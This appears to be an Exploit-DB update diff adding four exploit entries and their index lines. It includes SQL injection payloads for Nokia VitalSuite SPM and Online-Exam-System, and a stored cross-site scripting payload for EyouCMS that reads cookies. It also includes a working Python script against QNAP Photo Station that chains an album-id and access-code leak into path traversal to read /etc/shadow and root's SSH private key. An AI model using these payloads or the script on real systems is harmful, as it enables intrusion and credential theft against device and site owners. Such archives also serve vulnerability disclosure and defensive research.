DB: 2020-05-29

4 changes to exploits/shellcodes

NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
Online-Exam-System 2015 - 'fid' SQL Injection
EyouCMS 1.4.6 - Persistent Cross-Site Scripting
QNAP QTS and Photo Station 6.0.3 - Remote Command Execution

exploits/multiple/webapps/48528.txt

@@ -0,0 +1,31 @@
+# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2020-05-28
+# Vendor Homepage: https://www.nokia.com
+# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/
+# Affected Version: v2020
+# Tested on: MacosX
+# CVE : N/A
+
+
+# PoC
+
+
+POST /cgi-bin/vsloginadmin.exe HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Accept: /
+Accept-Encoding: gzip,deflate
+Content-Length: 84
+Host: berklocal
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
+like Gecko) Chrome/41.0.2228.0 Safari/537.21
+
+Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1
+
+Example Time-Based payload
+
+UserName=test'; waitfor delay '00:00:10' --

exploits/php/webapps/48529.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2020-05-28
+# Vendor Homepage: https://github.com/sunnygkp10/
+# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
+# Affected Version: 2015
+# Tested on: MacosX
+# CVE : N/A
+
+# PoC
+
+Affected code
+
+<?php if(@$_GET['fid']) {
+echo '<br />';
+$id=@$_GET['fid'];
+$result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or
+die('Error');
+
+http://berklocal/dash.php?fid=SQL-INJECTION

exploits/php/webapps/48530.txt

@@ -0,0 +1,30 @@
+# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting
+# Date: 2020-05-28
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: https://eyoucms.com
+# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip
+# Version: EyouCMS V1.4.6
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1
+Host: 192.168.31.244
+Content-Length: 131
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.31.244
+Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php
+Connection: close
+
+title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111<img src=1 onerror=alert(document.cookie)>&__token__=b90d4bf2356b81f65284238857b91ada
+
+
+
+王新峰    技术管理部
+中国银行保险信息技术管理有限公司

exploits/php/webapps/48531.py

@@ -0,0 +1,103 @@
+# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
+# Exploit Author: Yunus YILDIRIM (Th3Gundy)
+# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
+# Date: 2020-05-28
+# Vendor Homepage: https://www.qnap.com
+# Version: QTS < 4.4.1 |  Photo Station < 6.0.3
+# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195
+# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
+# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
+# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
+
+######################################################################
+######################################################################
+
+#!/usr/bin/python3
+
+__author__  = "Yunus YILDIRIM (@Th3Gundy)"
+__version__ = "0.1"
+
+
+import requests
+import re, sys
+
+# hide ssl error
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def get_banner():
+    print("""\033[91m
+  █████   ███▄    █  ▄▄▄       ██▓███  
+▒██▓  ██▒ ██ ▀█   █ ▒████▄    ▓██░  ██▒
+▒██▒  ██░▓██  ▀█ ██▒▒██  ▀█▄  ▓██░ ██▓▒
+░██  █▀ ░▓██▒  ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒
+░▒███▒█▄ ▒██░   ▓██░ ▓█   ▓██▒▒██▒ ░  ░
+░░ ▒▒░ ▒ ░ ▒░   ▒ ▒  ▒▒   ▓▒█░▒▓▒░ ░  ░
+ ░ ▒░  ░ ░ ░░   ░ ▒░  ▒   ▒▒ ░░▒ ░     
+   ░   ░    ░   ░ ░   ░   ▒   ░░       
+    ░             ░       ░  ░  \033[0m     \033[94m {0} \033[0m
+    """.format(__author__))
+
+
+def get_file_content(file):
+    post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
+    file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+    print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text))
+
+# print banner
+get_banner()
+
+if len(sys.argv) != 2:
+    print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m")
+    sys.exit(-1)
+    
+url = sys.argv[1].rstrip('/')
+headers = {"User-Agent": "Gundy - QNAP RCE"}
+
+# for session cookie
+req = requests.Session()
+
+#######################################################################
+# search album_id
+
+print("="*65)
+post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
+album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+if album_id_response.status_code != 200:
+    print("album id not found \n\033[91mnot vulnerable\033[0m")
+    sys.exit(0)
+    
+album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group()
+
+print("album_id     ==>  " + album_id)
+
+#######################################################################
+# search $_SESSION['access_code'] 
+
+access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
+if access_code_response.status_code != 200:
+    print("slideshow not found \n\033[91mnot vulnerable\033[0m")
+    sys.exit(0)
+    
+access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
+
+print("access_code  ==>  " + access_code)
+
+#######################################################################
+
+# /etc/passwd file read
+get_file_content('./../../../../../etc/passwd')
+
+# /etc/shadow read
+get_file_content('./../../../../../etc/shadow')
+
+# /etc/hostname read
+get_file_content('./../../../../../etc/hostname')
+
+# /root/.ssh/id_rsa read
+get_file_content('./../../../../../root/.ssh/id_rsa')
+
+#######################################################################

files_exploits.csv

@@ -42755,3 +42755,7 @@ id,file,description,date,author,type,platform,port
 48525,exploits/php/webapps/48525.txt,"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php,
 48526,exploits/php/webapps/48526.txt,"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting",2020-05-27,"China Banking and Insurance Information Technology Management Co.",webapps,php,
 48527,exploits/php/webapps/48527.txt,"OXID eShop 6.3.4 - 'sorting' SQL Injection",2020-05-27,VulnSpy,webapps,php,
+48528,exploits/multiple/webapps/48528.txt,"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection",2020-05-28,"Berk Dusunur",webapps,multiple,
+48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,
+48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php,